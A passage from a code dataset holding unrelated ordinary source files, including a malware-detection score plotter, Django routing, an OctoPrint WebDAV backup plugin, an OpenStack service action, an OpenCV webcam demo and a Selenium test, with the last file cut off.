ax.plot(malware_data[num], label = \"Malware with Confidence %s%%\" % ((1 - alpha[num]) * 100))\n plt.xlabel(\"Program Under Test\")\n plt.ylabel(\"Score (lambda)\")\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n# plt.show()\n plt.title(\"Variation of Score for Program Under Test \\n for different Confidence Level\")\n plt.tight_layout()\n plt.savefig(\"significance.png\", bbox_inches='tight')\n \ndef plot():\n benign_data = []\n malware_data = []\n for a in alpha:\n data = pd.read_csv(str(a)+\"_score.txt\", header=None).as_matrix()[:,0]\n benign_data.append(data[0:10])\n malware_data.append(data[10:20])\n line_plot(benign_data, malware_data)\n \n for i in range(len(alpha)):\n data1 = benign_data[i]\n data2 = malware_data[i]\n diff = 0\n for i in range(len(data2)):\n for j in range(len(data1)):\n diff = diff + (data2[i] - data1[j])\n print(diff/(len(data1)*len(data2)))\n\ndef line_plot_hotelling(benign_data, malware_data):\n ax = plt.subplot(111)\n ax.plot(benign_data[0], label = \"Benign for Welch's t-test\")\n ax.plot(malware_data[0], label = \"Malware for Welch's t-test\")\n ax.plot(benign_data[1], label = \"Benign for Hotelling's t-test\")\n ax.plot(malware_data[1], label = \"Malware for Hotelling's t-test\")\n plt.xlabel(\"Program Under Test\")\n plt.ylabel(\"Score (lambda)\")\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n plt.show()\n\ndef plot_hotelling():\n benign_data = []\n malware_data = []\n data1 = pd.read_csv(str(alpha)+\"_score.txt\", header=None).as_matrix()[:,0]\n data2 = pd.read_csv(\"../multivariate_detection_equal_variance/score.txt\", header=None).as_matrix()[:,0]\n benign_data.append(data1[0:10])\n malware_data.append(data1[10:20])\n benign_data.append(data2[0:10])\n malware_data.append(data2[10:20])\n line_plot_hotelling(benign_data, malware_data)\n for i in range(2):\n data1 = benign_data[i]\n data2 = malware_data[i]\n diff = 0\n for i in range(len(data2)):\n for j in range(len(data1)):\n diff = diff + (data2[i] - data1[j])\n print(diff/(len(data1)*len(data2)))\n\nplot()","sub_path":"t_test_detection/univariate_detection/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"604269252","text":"import sys\r\nimport json\r\n\r\njsonFile = open(\"questions.json\", \"w+\")\r\nquestionsFile = open(\"questions.txt\", \"r+\").read()\r\nanswersFile = open(\"answers.txt\", \"r+\").read()\r\n\r\nquestions = [question for question in questionsFile.split('\\n') if question]\r\nanswers = [answer for answer in answersFile.split('\\n') if answer]\r\nquestLen = [len(questions) if len(questions) == len(answers) else print('No hay la misma cantidad de preguntas que de respuestas')] \r\n[None if questLen else sys.exit()]\r\n\r\nmyobj = {\r\n\t\"questArray\" : []\r\n}\r\n\r\nfor combo in range(questLen[0]):\r\n\tmyobj[\"questArray\"].append({\r\n\t\t\t\"question\": questions[combo],\r\n\t\t\t\"answer\": answers[combo]\r\n\t\t})\r\n\r\njson.dump(myobj, jsonFile)\r\njsonFile.close();","sub_path":"questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"307515103","text":"from django.urls import path\nfrom django.conf.urls import url, include\nfrom rest_framework import routers\nfrom rest_framework_nested import routers\nfrom . import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet, base_name='users')\nrouter.register(r'profile', views.UserProfileViewSet, base_name='profile')\nrouter.register(r'public_profile', views.UserPublicProfileViewSet, base_name='public_profile')\nrouter.register(r'ROOT', views.GroupRootViewSet, base_name='grouproot')\nrouter.register(r'groups', views.GroupViewSet, base_name='group') # lookup= 'groups'\n\ngroup_router = routers.NestedSimpleRouter(router, r'groups') # lookup= 'children'\ngroup_router.register(r'children', views.ChildrenViewSet, base_name='children')\n\ngroupchat_router = routers.NestedSimpleRouter(router, r'groups') # lookup= 'groupchat'\ngroupchat_router.register(r'chat', views.GroupChatViewSet, base_name='chat')\n\nmessages_router = routers.NestedSimpleRouter(groupchat_router, r'chat')\nmessages_router.register(r'messages', views.GroupChatMessageViewSet, base_name='messages')\n\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^', include(group_router.urls)),\n url(r'^', include(groupchat_router.urls)),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"582645088","text":"#!/usr/bin/env python\n# encoding: utf-8\n# @software: PyCharm\n# @time: 2019/8/26 13:44\n# @author: Paulson●Wier\n# @file: selectionSort.py\n# @desc:\n\n\ndef select_sort(arr):\n for i in range(len(arr)-1):\n # 记录最小数的索引\n min_index = i\n for j in range(i+1, len(arr)):\n if arr[j] < arr[min_index]:\n min_index = j\n # i 不是最小数时, 将i和最小数进行交换\n if i != min_index:\n arr[i], arr[min_index] = arr[min_index], arr[i]\n print(arr)\n return arr\n\n\nif __name__ == '__main__':\n arr = [1, 0, 32, 12, 5, 76, 7]\n print(select_sort(arr=arr))\n\n\n\n\n","sub_path":"selectionSort.py","file_name":"selectionSort.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"101166908","text":"import curses\nimport guesivian.coordinate as coord\nimport guesivian.color as color\n\n\nclass Room(object):\n \"\"\" Widget for main game screen \"\"\"\n\n def __init__(self, width=60, height=30, entities=None, lookat=None):\n \"\"\" Creates a new room, defaulting to size (60, 30) \"\"\"\n self.width = width\n self.height = height\n self.entities = coord.QuadTree(coord.Rectangle(0, 0, width, height))\n if entities is not None:\n for x in entities:\n self.entities.insert(x)\n self.lookat = lookat or coord.Point(0, 0)\n\n def display(self, screensize):\n \"\"\"\n Changes the state of the pad to the new game state.\n Does not actually update the screen.\n \"\"\"\n self.pad.clear()\n tlx, tly = screensize.top_left()\n brx, bry = screensize.bottom_right()\n rect = coord.Rectangle(tlx, tly, self.width, self.height)\n self.bounds = rect\n col = filter(lambda e: e.visible, self.entities.inarea(rect))\n palette = color.default()\n for entity in col:\n self.pad.move(entity.position.y(), entity.position.x())\n if entity.position + coord.Point(1, 1) == rect.bottom_right():\n paint = self.pad.insstr\n else:\n paint = self.pad.addstr\n paint(entity.face, curses.color_pair(palette[entity.color_code]))\n self.pad.noutrefresh(self.lookat.y(), self.lookat.x(), tly, tlx,\n bry, brx)\n\n def create_pad(self):\n \"\"\" Creates a pad in the screen for this room \"\"\"\n self.pad = curses.newpad(self.height, self.width)\n\n def focus(self, focalpoint, screensize):\n \"\"\"\n Focus the screen on a specific point.\n To be used when the logical room is bigger than the display.\n The focal point is usually the hero location.\n \"\"\"\n width, height = screensize.size()\n fx, fy = focalpoint\n lookatx = fx - (width / 2)\n lookaty = fy - (height / 2)\n self.lookat = coord.Point(lookatx, lookaty)\n\n def entities_at(self, position):\n \"\"\" Looks for an entity in a given position \"\"\"\n # Note this will most likely be changed to a tree or similar\n # instead of linear searching later on.\n return (e for e in self.entities if e.position == position)\n\n def fill_border(self, creator):\n \"\"\" Fills the border with entities created by ``creator`` \"\"\"\n for pt in coord.Rectangle(w=self.width, h=self.height).borders():\n e = creator()\n e.position = pt\n self.entities.insert(e)\n\n\nclass Display(object):\n \"\"\" Manages all the other display widgets \"\"\"\n\n def __init__(self, width=80, height=40):\n \"\"\" Initializes the display manager, defaults to size (80, 40) \"\"\"\n self.width = width\n self.height = height\n self.currentroom = None\n self.widgets = []\n self.scr = curses.initscr()\n self._initcurses()\n\n def _initcurses(self):\n curses.start_color()\n color.init_default()\n curses.noecho()\n curses.curs_set(False)\n self.scr.keypad(True)\n\n def cleanup(self):\n \"\"\" Cleanup the terminal to default state \"\"\"\n curses.nocbreak()\n self.scr.keypad(False)\n curses.echo()\n curses.endwin()\n\n def display(self):\n \"\"\" Displays every widget on the screen \"\"\"\n screen = coord.Rectangle(0, 0, self.width, self.height)\n for widget in self.widgets:\n widget.display(screen)\n curses.doupdate()\n\n def set_room(self, room):\n \"\"\" Sets the current room \"\"\"\n if self.currentroom is not None and self.currentroom in self.widgets:\n self.widgets.remove(self.current)\n self.currentroom = room\n self.widgets.append(room)\n\n def readkey(self):\n \"\"\" Reads a key from stdin as a string \"\"\"\n return self.scr.getkey()\n\n\nclass Log(object):\n \"\"\" Displays a history log with messages to the pĺayer \"\"\"\n\n def __init__(self, count=None, history=100):\n \"\"\"\n Instantiates a log widget for ``count`` messages in ``position``\n (relative to Display-parent). Stores up to ``history`` messages\n available for navigation (if ``history``>``count``, that is).\n If ``count`` is not supplied, the height of the windows area will\n be used instead. Messages won't be retrievable until ``count`` is set.\n \"\"\"\n self.entries = []\n self.count = count\n self.history = history\n\n def log(self, msg):\n \"\"\" Logs a new message \"\"\"\n self.entries.append(msg)\n if len(self.entries) > self.history:\n self.entries = self.entries[1:]\n\n def messages(self):\n \"\"\" Returns the last ``count`` messages \"\"\"\n return self.entries[-self.count:]\n\n def create_window(self, area):\n \"\"\"\n Creates the curses window for the log widget.\n If ``count`` is not set or is higher than the height, the height\n will be used as the count.\n \"\"\"\n width, height = area.size()\n ax, ay = area.top_left()\n self.window = curses.newwin(height, width, ay, ax)\n if self.count is None:\n self.count = height\n else:\n self.count = min(height, self.count)\n\n def display(self, screensize):\n \"\"\" Displays the last ``count`` messages on screen \"\"\"\n msgs = self.messages()\n self.window.clear()\n for y in range(len(msgs)):\n self.window.insstr(y, 0, msgs[y])\n self.window.noutrefresh()\n","sub_path":"guesivian/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":5616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"546130240","text":"__author__ = 'rolandh'\n\n\nNAME = [\"givenName\", \"displayName\", \"sn\"]\nSTATIC_ORG_INFO = [\"c\", \"o\", \"co\", \"norEduOrgAcronym\", \"schacHomeOrganization\",\n 'schacHomeOrganizationType']\nOTHER = [\"eduPersonPrincipalName\", \"eduPersonScopedAffiliation\", \"mail\"]\n\n# These give you access to information\nRESEARCH_AND_EDUCATION = \"http://www.swamid.se/category/research-and-education\"\nSFS_1993_1153 = \"http://www.swamid.se/category/sfs-1993-1153\"\n\n# presently these don't by themself\nEU = \"http://www.swamid.se/category/eu-adequate-protection\"\nNREN = \"http://www.swamid.se/category/nren-service\"\nHEI = \"http://www.swamid.se/category/hei-service\"\n\nRELEASE = {\n \"\": [\"eduPersonTargetedID\"],\n SFS_1993_1153: [\"norEduPersonNIN\"],\n (RESEARCH_AND_EDUCATION, EU): NAME + STATIC_ORG_INFO + OTHER,\n (RESEARCH_AND_EDUCATION, NREN): NAME + STATIC_ORG_INFO + OTHER,\n (RESEARCH_AND_EDUCATION, HEI): NAME + STATIC_ORG_INFO + OTHER,\n}","sub_path":"desktop/core/ext-py/pysaml2-4.4.0/src/saml2/entity_category/swamid.py","file_name":"swamid.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"277748581","text":"# -*- encoding: utf-8 -*-\n# Copyright (c) 2015 b<>com\n#\n# Authors: Jean-Emile DARTOIS \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom watcher._i18n import _\nfrom watcher.applier.actions import base\nfrom watcher.common import exception\nfrom watcher.common import nova_helper\nfrom watcher.decision_engine.model import element\n\n\nclass ChangeNovaServiceState(base.BaseAction):\n \"\"\"Disables or enables the nova-compute service, deployed on a host\n\n By using this action, you will be able to update the state of a\n nova-compute service. A disabled nova-compute service can not be selected\n by the nova scheduler for future deployment of server.\n\n The action schema is::\n\n schema = Schema({\n 'resource_id': str,\n 'state': str,\n 'disabled_reason': str,\n })\n\n The `resource_id` references a nova-compute service name (list of available\n nova-compute services is returned by this command: ``nova service-list\n --binary nova-compute``).\n The `state` value should either be `ONLINE` or `OFFLINE`.\n The `disabled_reason` references the reason why Watcher disables this\n nova-compute service. The value should be with `watcher_` prefix, such as\n `watcher_disabled`, `watcher_maintaining`.\n \"\"\"\n\n STATE = 'state'\n REASON = 'disabled_reason'\n RESOURCE_NAME = 'resource_name'\n\n @property\n def schema(self):\n return {\n 'type': 'object',\n 'properties': {\n 'resource_id': {\n 'type': 'string',\n \"minlength\": 1\n },\n 'resource_name': {\n 'type': 'string',\n \"minlength\": 1\n },\n 'state': {\n 'type': 'string',\n 'enum': [element.ServiceState.ONLINE.value,\n element.ServiceState.OFFLINE.value,\n element.ServiceState.ENABLED.value,\n element.ServiceState.DISABLED.value]\n },\n 'disabled_reason': {\n 'type': 'string',\n \"minlength\": 1\n }\n },\n 'required': ['resource_id', 'state'],\n 'additionalProperties': False,\n }\n\n @property\n def host(self):\n return self.input_parameters.get(self.RESOURCE_NAME)\n\n @property\n def state(self):\n return self.input_parameters.get(self.STATE)\n\n @property\n def reason(self):\n return self.input_parameters.get(self.REASON)\n\n def execute(self):\n target_state = None\n if self.state == element.ServiceState.DISABLED.value:\n target_state = False\n elif self.state == element.ServiceState.ENABLED.value:\n target_state = True\n return self._nova_manage_service(target_state)\n\n def revert(self):\n target_state = None\n if self.state == element.ServiceState.DISABLED.value:\n target_state = True\n elif self.state == element.ServiceState.ENABLED.value:\n target_state = False\n return self._nova_manage_service(target_state)\n\n def _nova_manage_service(self, state):\n if state is None:\n raise exception.IllegalArgumentException(\n message=_(\"The target state is not defined\"))\n\n nova = nova_helper.NovaHelper(osc=self.osc)\n if state is True:\n return nova.enable_service_nova_compute(self.host)\n else:\n return nova.disable_service_nova_compute(self.host, self.reason)\n\n def pre_condition(self):\n pass\n\n def post_condition(self):\n pass\n\n def get_description(self):\n \"\"\"Description of the action\"\"\"\n return (\"Disables or enables the nova-compute service.\"\n \"A disabled nova-compute service can not be selected \"\n \"by the nova for future deployment of new server.\")\n","sub_path":"watcher/applier/actions/change_nova_service_state.py","file_name":"change_nova_service_state.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"160727079","text":"# coding=utf-8\nfrom __future__ import absolute_import\n\nfrom os import path as ospath\nimport math\nimport logging\nfrom webdav3.client import Client\nfrom webdav3.exceptions import WebDavException,ResponseErrorCode,RemoteResourceNotFound\nfrom datetime import datetime\nfrom http import HTTPStatus\nimport octoprint.plugin\nfrom octoprint.events import Events, eventManager\nfrom octoprint.server import user_permission\nfrom octoprint.settings import settings\n\nSETTINGS_DEFAULTS = dict(\n server=None,\n username=None,\n password=None,\n timeout=30,\n verify_certificate=True,\n upload_path=\"/\",\n check_space=False\n)\n\nclass WebDavBackupPlugin(octoprint.plugin.SettingsPlugin,\n octoprint.plugin.AssetPlugin,\n octoprint.plugin.TemplatePlugin,\n octoprint.plugin.EventHandlerPlugin,\n):\n\n def __init__(self):\n self._logger = logging.getLogger(__name__)\n\n ##~~ SettingsPlugin mixin\n def get_settings_defaults(self):\n return SETTINGS_DEFAULTS\n\n ##~~ EventHandlerPlugin mixin\n def on_event(self, event, payload):\n if event == \"plugin_backup_backup_created\":\n # Helper function for human readable sizes\n def _convert_size(size_bytes):\n if size_bytes == 0:\n return \"0B\"\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n i = int(math.floor(math.log(size_bytes, 1024)))\n p = math.pow(1024, i)\n s = round(size_bytes / p, 2)\n return \"%s %s\" % (s, size_name[i])\n\n now = datetime.now()\n\n davoptions = {\n 'webdav_hostname': self._settings.get([\"server\"]),\n 'webdav_login': self._settings.get([\"username\"]),\n 'webdav_password': self._settings.get([\"password\"]),\n 'webdav_timeout': self._settings.get([\"timeout\"]),\n }\n\n backup_path = payload[\"path\"]\n backup_name = payload[\"name\"]\n self._logger.info(\"Backup \" + backup_path + \" created, will now attempt to upload to \" + davoptions[\"webdav_hostname\"])\n\n davclient = Client(davoptions)\n davclient.verify = self._settings.get([\"verify_certificate\"])\n check_space = self._settings.get([\"check_space\"])\n upload_path = now.strftime(self._settings.get([\"upload_path\"]))\n upload_path = ospath.join(\"/\", upload_path)\n if self._settings.get([\"upload_name\"]):\n upload_name = now.strftime(self._settings.get([\"upload_name\"])) + ospath.splitext(backup_path)[1]\n self._logger.debug(\"Filename for upload: \" + upload_name)\n else:\n upload_name = backup_name\n upload_file = ospath.join(\"/\", upload_path, upload_name)\n upload_temp = ospath.join(\"/\", upload_path, upload_name + \".tmp\")\n\n # Check actual connection to the WebDAV server as the check command will not do this.\n try:\n # If the resource was not found\n if check_space:\n dav_free = davclient.free()\n if dav_free < 0:\n # If we get a negative free size, this server is not returning correct value.\n check_space = False\n self._logger.warning(\"Free space on server: \" + _convert_size(dav_free) + \", it appears your server does not support reporting size correctly\")\n else:\n self._logger.info(\"Free space on server: \" + _convert_size(dav_free))\n else:\n # Not as proper of a check as retrieving size, but it's something.\n davclient.check(\"/\")\n except RemoteResourceNotFound as exception:\n self._logger.error(\"Resource was not found, something is probably wrong with your settings.\")\n return\n except ResponseErrorCode as exception:\n # Write error and exit function\n status = HTTPStatus(exception.code)\n error_switcher = {\n 400: \"Bad request\",\n 401: \"Unauthorized\",\n 403: \"Forbidden\",\n 404: \"Not found\",\n 405: \"Method not allowed\",\n 408: \"Request timeout\",\n 500: \"Internal error\",\n 501: \"Not implemented\",\n 502: \"Bad gateway\",\n 503: \"Service unavailable\",\n 504: \"Gateway timeout\",\n 508: \"Loop detected\",\n }\n if (exception.code == 401):\n http_error = \"HTTP error 401 encountered, your credentials are most likely wrong.\"\n else:\n http_error = \"HTTP error encountered: \" + str(status.value) + \" \" + error_switcher.get(exception.code, status.phrase)\n self._logger.error(http_error)\n return\n except WebDavException as exception:\n self._logger.error(\"An unexpected WebDAV error was encountered: \" + exception.args)\n raise\n\n backup_size = ospath.getsize(backup_path)\n self._logger.info(\"Backup file size: \" + _convert_size(backup_size))\n\n if check_space and backup_size > dav_free:\n self._logger.error(\"Unable to upload, size is\" + _convert_size(backup_size) + \", free space is \" + _convert_size(dav_free))\n else:\n # Helper function to recursively create paths\n def _recursive_create_path(path):\n # Append leading / for preventing abspath issues\n path = ospath.join(\"/\", path)\n if davclient.check(path):\n self._logger.debug(\"Directory \" + path + \" was found.\")\n return True\n else:\n if path != \"/\":\n self._logger.debug(\"Directory \" + path + \" was not found, checking parent.\")\n if _recursive_create_path(ospath.abspath(ospath.join(path, \"..\"))):\n davclient.mkdir(path)\n self._logger.debug(\"Directory \" + path + \" has been created.\")\n return True\n else:\n self._logger.error(\"Could not find WebDAV root, something is probably wrong with your settings.\")\n return False\n\n if _recursive_create_path(upload_path):\n davclient.upload_sync(remote_path=upload_temp, local_path=backup_path)\n davclient.move(remote_path_from=upload_temp, remote_path_to=upload_file)\n self._logger.info(\"Backup has been uploaded successfully to \" + davoptions[\"webdav_hostname\"] + \" as \" + upload_file)\n else:\n self._logger.error(\"Something went wrong trying to check/create the upload path.\")\n\n ##~~ TemplatePlugin mixin\n def get_template_configs(self):\n return [\n dict(\n type=\"settings\", custom_bindings=False\n )\n ]\n\n ##~~ Softwareupdate hook\n def get_update_information(self):\n return dict(\n webdavbackup=dict(\n displayName=\"WebDAV Backup\",\n displayVersion=self._plugin_version,\n\n type=\"github_release\",\n user=\"edekeijzer\",\n repo=\"OctoPrint-WebDavBackup\",\n current=self._plugin_version,\n\t\t\t\tstable_branch=dict(\n\t\t\t\t\tname=\"Stable\",\n\t\t\t\t\tbranch=\"main\",\n\t\t\t\t\tcomittish=[\"main\"]\n\t\t\t\t),\n\t\t\t\tprerelease_branches=[\n\t\t\t\t\tdict(\n\t\t\t\t\t\tname=\"Release Candidate\",\n\t\t\t\t\t\tbranch=\"rc\",\n\t\t\t\t\t\tcomittish=[\"rc\", \"main\"]\n\t\t\t\t\t)\n\t\t\t\t],\n pip=\"https://github.com/edekeijzer/OctoPrint-WebDavBackup/archive/{target_version}.zip\"\n )\n )\n\n\n__plugin_name__ = \"WebDAV Backup\"\n__plugin_pythoncompat__ = \">=3,<4\"\n\ndef __plugin_load__():\n global __plugin_implementation__\n __plugin_implementation__ = WebDavBackupPlugin()\n\n global __plugin_hooks__\n __plugin_hooks__ = {\n \"octoprint.plugin.softwareupdate.check_config\": __plugin_implementation__.get_update_information\n }\n\n","sub_path":"octoprint_webdavbackup/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"340932586","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('history', '0002_auto_20150914_1558'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='person',\n options={'ordering': ['-date_of_birth']},\n ),\n migrations.AddField(\n model_name='event',\n name='people',\n field=models.ManyToManyField(related_name='events', to='history.Person', blank=True),\n ),\n migrations.AddField(\n model_name='person',\n name='date_of_birth_precision',\n field=models.PositiveSmallIntegerField(default=1, choices=[(1, b'year'), (2, b'month'), (3, b'day')]),\n ),\n migrations.AddField(\n model_name='person',\n name='date_of_death_precision',\n field=models.PositiveSmallIntegerField(default=1, choices=[(1, b'year'), (2, b'month'), (3, b'day')]),\n ),\n ]\n","sub_path":"history/migrations/0003_auto_20150914_1609.py","file_name":"0003_auto_20150914_1609.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"534368913","text":"import cv2\nimport numpy\n\nx_st = 150\ny_st = 150\nx_sp = x_st + 300\ny_sp = y_st + 200\n\nRECT = ((x_st, y_st), (x_sp, y_sp))\n(left, top), (right, bottom) = RECT\n\ndef roiarea(frame):\n return frame[top:bottom, left:right]\n \ndef replaceroi(frame, roi):\n frame[top:bottom, left:right] = roi\n return frame\n\ndef image_process(roi):\n '''\n print(type(roi))\n print('shape = ', roi.shape)\n print('W = ', roi.shape[1])\n print('H = ', roi.shape[0])\n '''\n W = roi.shape[1]\n H = roi.shape[0]\n for j in range(H):\n for i in range(W):\n b = roi[j][i][0]\n g = roi[j][i][1]\n r = roi[j][i][2]\n a = ((numpy.int16)(b) + (numpy.int16)(g) + (numpy.int16)(r))//3\n #roi[j][i][0] = roi[j][i][1] = roi[j][i][2] = (numpy.uint8)(a)\n #roi[j][i][0] = 255 #B\n #roi[j][i][1] = 255 #G\n roi[j][i][2] = 255 #R\n return roi\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n ret, frame = cap.read()\n frame = cv2.flip(frame, 1)\n\n roi1 = roiarea(frame) #取出子畫面\n #roi2 = cv2.cvtColor(roi1, cv2.COLOR_BGR2HSV) #做影像處理1\n roi2 = image_process(roi1) #做影像處理2\n frame = replaceroi(frame, roi2) #貼回原畫面\n cv2.rectangle(frame, RECT[0], RECT[1], (0, 255, 0), 2)#畫一個框 (BGR), linewidth\n \n cv2.imshow('frame', frame)\n \n if cv2.waitKey(1) == 27:\n roi2 = image_process(roi1) #做影像處理\n cv2.destroyAllWindows()\n break\n","sub_path":"_4.python/opencv/opencv13_webcam3_image_processing.py","file_name":"opencv13_webcam3_image_processing.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"551933721","text":"from django.http import HttpResponsePermanentRedirect\n\n#http://djangosnippets.org/snippets/2655/\n\nclass RedirectToNoSlash(object):\n def process_request(self, request):\n #added the following as POSTs failing when redirected\n if request.method != 'POST':\n if '/admin' not in request.path and request.path != '/':\n if '/captcha/' not in request.path:\n if '/voucher/' not in request.path:\n if request.path[-1] == '/':\n return HttpResponsePermanentRedirect(request.path[:-1])\n","sub_path":"hyperlocal/mymiddleware/mymiddleware.py","file_name":"mymiddleware.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"37485204","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nfrom django import forms\r\nimport models\r\nclass electric_form(forms.ModelForm):\r\n\tclass Meta:\r\n\t\tmodel = models.Electric #this relted back to the models.py\r\n\t\tfields = (\r\n\t\t \t\t\t# 'date_created',\r\n\t\t \t\t\t'created_by',\r\n\t\t\t\t\t't_bar',\r\n\t\t\t\t\t'customer',\r\n\t\t\t\t\t'rma_number',\r\n\t\t\t\t\t'customer_meter_identifier',\r\n\t\t\t\t\t'sensus_identifier',\r\n\t\t\t\t\t'cem',\r\n\t\t\t\t\t'date_mfg',\r\n\t\t\t\t\t'meter_type',\r\n\t\t\t\t\t'meter_form',\r\n\t\t\t\t\t'customer_complaint',\r\n\t\t\t\t\t'customer_problem_description',\r\n\t\t\t\t\t'two_si',\r\n\t\t\t\t\t'display_test',\r\n\t\t\t\t\t'accuracy_test',\r\n\t\t\t\t\t'buddy_box_com_test',\r\n\t\t\t\t\t'kwh_reading',\r\n\t\t\t\t\t'meter_firmware_ver',\r\n\t\t\t\t\t'flexnet_firmware_ver',\r\n\t\t\t\t\t'fl',\r\n\t\t\t\t\t'll',\r\n\t\t\t\t\t'pf',\r\n\t\t\t\t\t'll_a',\r\n\t\t\t\t\t'll_c',\r\n\t\t\t\t\t'a',\r\n\t\t\t\t\t'c',\r\n\t\t\t\t\t'lla_12s',\r\n\t\t\t\t\t'llc_12s',\r\n\t\t\t\t\t'pfa_12s',\r\n\t\t\t\t\t'pfc_12s',\r\n\t\t\t\t\t'date_rma_opened',\r\n\t\t\t\t\t'meters_received_in_sensus',\r\n\t\t\t\t\t'column1',\r\n\t\t\t\t\t'failure_cause',\r\n\t\t\t\t\t'failure_mechanism',\r\n\t\t\t\t\t'root_cause',\r\n\t\t\t\t\t'column2',\r\n\t\t\t\t\t'reference_designator',\r\n\t\t\t\t\t'component_markings',\r\n\t\t\t\t\t'r11',\r\n\t\t\t\t\t'testing_tech',\r\n\t\t\t\t\t'disposition',\r\n\r\n\t\t\t\t\t)\r\n","sub_path":"sensei_web/fa_tracking/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"644719034","text":"import urllib\nimport os\n\ndef save_img(img_url,file_name,file_path='picture'):\n '保存图片到磁盘文件夹 file_path中,默认为当前脚本运行目录下的picture文件夹'\n try:\n if not os.path.exists(file_path):\n print('文件夹',file_path,'不存在,重新建立')\n #os.mkdir(file_path)\n os.makedirs(file_path)\n #获得图片后缀\n file_suffix = os.path.splitext(img_url)[1]\n #拼接图片名(包含路径)\n filename = '{}{}{}{}'.format(file_path,os.sep,file_name,file_suffix)\n #下载图片,并保存到文件夹中\n urllib.request.urlretrieve(img_url,filename=filename)\n except IOError as e:\n print('文件操作失败',e)\n except Exception as e:\n print('错误 :',e)","sub_path":"savePicture.py","file_name":"savePicture.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"601013549","text":"import allure\nfrom allure_commons.types import AttachmentType\nfrom Pages.Accept_vacancy import AcceptVacancy, LoginPage\n\n\nclass TestVacansyOk(AcceptVacancy):\n\n expect = \"Вакансия была успешно одобрена\"\n\n def test_ok_vacancy(self, adding_vacancy, get_vacancy_id, find_element_by_xpath, send_text, browser):\n self.login_page = LoginPage()\n self.acc_vacancy = AcceptVacancy()\n adding_vacancy()\n get_vacancy_id()\n vacancy_id = get_vacancy_id()\n self.login_page.hr_out(browser)\n self.login_page.admin_auth(browser)\n self.acc_vacancy.all_vacancy(find_element_by_xpath)\n self.acc_vacancy.take_last_vacancy(find_element_by_xpath, vacancy_id, browser)\n with allure.step('Делаем скриншот'):\n allure.attach(browser.get_screenshot_as_png(), name='screenshot', attachment_type=AttachmentType.PNG)\n assert self.expect in browser.page_source\n","sub_path":"tests/hr/test_ok_vacancy.py","file_name":"test_ok_vacancy.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"463302689","text":"# Execucao em 4,5 segundos\r\nimport pandas as pd\r\nfrom pandas import Series, read_csv\r\nfrom datetime import timedelta\r\nimport numpy as np\r\n################################ COMENTARIOS ######################################\r\n# Deve-se mudar para o diretorio 'direc' de saida do arquivo baixado no R.\r\n# O output do codigo deve ser tratado no excel em \"texto para coluna\" delimitado por virgulas e importado como texto ...\r\n# ... depois deve-se substituir ponto \".\" por virgula \",\" ...\r\n# ... e utilizado no arquivo Excel \"Tratar a expectativa do PIB para mensal.xlsx\".\r\n################################- Diretorio -######################################\r\n# Deve-se mudar para o diretorio 'direc' de saida do arquivo baixado no R.\r\ndirec = {'pib':'D:/Eric Ott/Faculdade/TCC/Modelo_BCB_Expec/PIB.csv'}\r\n##################################################################################\r\nfor serie in direc: # para cada diretorio\r\n\tfile1 = pd.read_csv(direc[serie]) # le o arquivo CSV\r\n\tref = pd.DatetimeIndex(file1['reference_quarter']) # Para o trimetre de referencia 